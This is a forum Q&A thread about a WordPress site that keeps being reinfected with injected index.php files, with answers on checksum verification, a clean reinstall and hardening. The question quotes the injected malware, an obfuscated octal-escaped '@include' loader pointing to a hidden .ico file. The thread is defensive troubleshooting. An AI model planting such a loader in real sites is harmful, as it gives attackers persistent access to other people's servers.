Wordpress Website Constantly Injected with index.php Files

Question

For the past 6 days I have been finding index.php files all over my Wordpress install with the following lines of code and similar.

/*371bd*/

@include "\057hom\145/tm\142m20\0616/p\165bli\143_ht\155l/V\151deo\163/ba\143kwp\165p-9\0622c4\070-te\155p/a\0622e4\143b96\1468d0\066a49\145521\143cfa\066881\146fe/\0568c7\1453c7\067.ic\157";

/*371bd*/

Everyday I completely remove all the index.php files by doing a scan and I also use Wordfence to find malicious code and remove it.

Once clean, I come back the next day and everything is back! How do I stop this once and for all?

Answer 1

Today I resurrected two websites that were offline infected with UBH (United Bangladeshi Hackers malware). It was not a very simple task and requires command line knowledge.

At first check the consistency of core Wordpress files the wp-cli tool is the way.

Run the command:

wp core verify-checksums --allow-root

The result

Success: WordPress installation verifies against checksums.

[PT-BR] Hoje eu ressucitei dois websites que estavam offline infectados com UBH. Não foi uma tarefa bem simples e requer conhecimentos de linha de comando.

A principio faça a verificação de consistência dos arquivos do núcleo Wordpress a ferramenta wp-cli foi o caminho.

Rode o comando:

wp core verify-checksums --allow-root

O resultado

Success: WordPress installation verifies against checksums.

Answer 2

Your website has been compromised - it's a typical attack for weak Wordpress websites.

First and foremost:

Do NOT use 'free' paid themes you download off of sketchy websites. Either use a real free theme from the Wordpress themes page or pay for a real premium theme from a reputable vendor.

Do NOT use 'free' paid plugins you download off of sketchy websites. Either use a legitimate plugin or pay for a premium one from a reputable vendor.

How to stop it once and for all?

1) If you're using a 'free' (paid) theme from some dodgy website, just don't. They typically contain back doors for injection such as this.

Either use a legitimate free theme or pay for a premium one.

2) Change your passwords from your email up to your webhosting. That includes your cPanel and FTP if you're using that.

3) Completely wipe ALL files off your server/public_html folder - start fresh.

4) Delete all MySQL databases.

4) Reinstall Wordpress using a legitimate theme and make sure you don't use 'admin' or 'administrator' as the username, set it to something else and set a strong password.

5) After a complete reinstallation, use a security plugin such as WP Cerber (excellent plugin) and change the default login URL from /wp-login to something custom (WP Cerber has this functionality)

6) Don't use any of the same username/passwords you used previously for anything. A password manager could come in handy here such as LastPass which will generate and remember very strong passwords for you.

7) Extra step: If you're familiar with the command line, use WP Scan to test your website against vulnerabilities. It's a tool design to do just that... Be sure you only use against your own websites though as it essentially looks for ways to 'get in' and compromise the site and may not be strictly legal to do it at will against other peoples websites.